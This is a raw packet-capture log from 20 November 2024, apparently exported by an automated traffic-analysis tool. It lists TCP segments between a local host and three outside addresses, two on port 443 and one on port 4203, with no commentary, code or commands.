                                                                                                        Nov 20, 2024 20:33:52.636645079 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.636657953 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.687946081 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.819397926 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.819411039 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.819487095 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.819504976 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.823401928 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.823410034 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.823479891 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.823488951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.826668978 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.826678038 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.826729059 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.826736927 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.829734087 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.829763889 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.829797029 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.829803944 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.829849958 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.833873987 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.833884001 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.833954096 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.833961964 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.834011078 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.837150097 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.837227106 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.837234020 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.841212034 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.841267109 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.841274977 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.844372034 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.844429970 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.844436884 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.847692966 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.847740889 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.847748041 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.851326942 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.851393938 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.851402044 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.854434967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.854491949 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.854499102 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.858505011 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.858567953 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.858576059 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.861802101 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.861871004 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.861877918 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.865858078 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.865912914 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.865941048 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.869045973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.869118929 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.869126081 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.872313023 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.872374058 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.872399092 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.922293901 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.030627966 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.030637980 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.030796051 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.030817032 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.033835888 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.033848047 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.033905029 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.033915043 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.037092924 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.037127018 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.037147999 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.037154913 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.037173033 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.041150093 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.041227102 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.041234970 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.044279099 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.044338942 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.044348955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.047485113 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.047593117 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.047600985 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.051603079 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.051712036 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.051721096 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.054905891 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.054975986 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.054985046 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.058001995 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.058069944 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.058079004 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.061672926 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.061764002 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.061777115 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.065772057 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.065860033 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.065867901 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.069169998 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.069261074 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.069269896 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.072170973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.072330952 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.072340965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.076262951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.076337099 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.076347113 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.079520941 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.079591036 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.079597950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.082699060 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.082760096 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.082768917 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.125523090 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.241405010 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.241420984 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.241579056 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.241595984 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.244513988 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.244561911 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.244579077 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.244589090 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.244611979 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.247823000 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.247931004 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.247942924 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.251883030 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.251961946 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.251971006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.255050898 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.255129099 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.255141973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.258219004 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.258296013 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.258304119 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.262465000 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.262531996 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.262557983 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.265727997 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.265794992 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.265803099 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.268871069 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.268954992 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.268965006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.272459030 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.272525072 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.272532940 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.276566982 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.276648045 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.276658058 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.279695988 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.279819012 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.279831886 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.282941103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.283149004 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.283163071 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.287018061 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.287096024 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.287107944 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.290208101 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.290278912 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.290287018 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.293651104 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.293715954 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.293724060 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.344207048 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.452013969 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.452023029 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.452167988 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.452184916 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.455079079 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.455092907 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.455177069 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.455187082 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.459187984 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.459197044 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.459264040 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.459274054 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.462436914 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.462474108 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.462491035 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.462498903 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.462521076 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.465607882 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.465699911 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.465712070 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.469671965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.469733000 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.469744921 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.473345041 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.473419905 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.473433971 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.476466894 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.476525068 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.476535082 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.481198072 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.481270075 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.481297016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.483846903 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.483907938 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.483917952 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.487227917 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.487330914 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.487340927 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.490200043 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.490257025 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.490268946 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.494308949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.494379997 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.494393110 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.497665882 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.497725010 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.497737885 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.500866890 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.500946045 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.500960112 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.504861116 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.504918098 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.504928112 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.547341108 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.662415981 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.662426949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.662559032 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.662575006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.666183949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.666222095 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.666274071 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.666281939 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.666307926 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.669898987 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.669908047 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.669984102 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.670000076 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.673450947 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.673516989 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.673530102 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.676286936 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.676347971 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.676358938 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.680243969 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.680299997 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.680309057 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.683389902 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.683450937 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:53.683453083 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.683496952 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:53.689028978 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:34:08.998987913 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:08.999094963 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:08.999334097 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:08.999908924 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:08.999948025 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:10.847804070 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:10.847893953 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:10.849500895 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:10.849509954 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:10.849833012 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:10.858856916 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:10.899378061 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.567109108 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.567131042 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.567224979 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.567234039 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.567254066 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.567289114 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.567327023 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.606225014 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.606256962 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.606328011 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.606336117 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.606426001 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.778119087 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.778146982 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.778249979 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.778278112 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.778804064 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.809717894 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.809792995 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.809859037 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.809879065 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.809889078 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.809917927 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.837320089 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.837395906 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.837452888 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.837469101 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.837496042 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.837522030 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.856468916 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.856542110 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.856609106 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.856621981 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.856640100 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.856667042 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.866027117 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.866151094 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.866161108 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.866192102 CET44349785108.181.20.35192.168.2.6
                                                                                                        Nov 20, 2024 20:34:11.866265059 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:11.866632938 CET49785443192.168.2.6108.181.20.35
                                                                                                        Nov 20, 2024 20:34:16.669605017 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:16.789294958 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:16.789434910 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:16.828174114 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:16.948050022 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:18.136667967 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:18.136728048 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:18.136785984 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:18.141889095 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:18.262876034 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:18.558278084 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:18.609875917 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:19.025351048 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:19.145540953 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:19.145611048 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:19.265450954 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:30.298459053 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:30.418196917 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:30.418394089 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:30.538206100 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:30.882651091 CET420349804181.71.217.114192.168.2.6
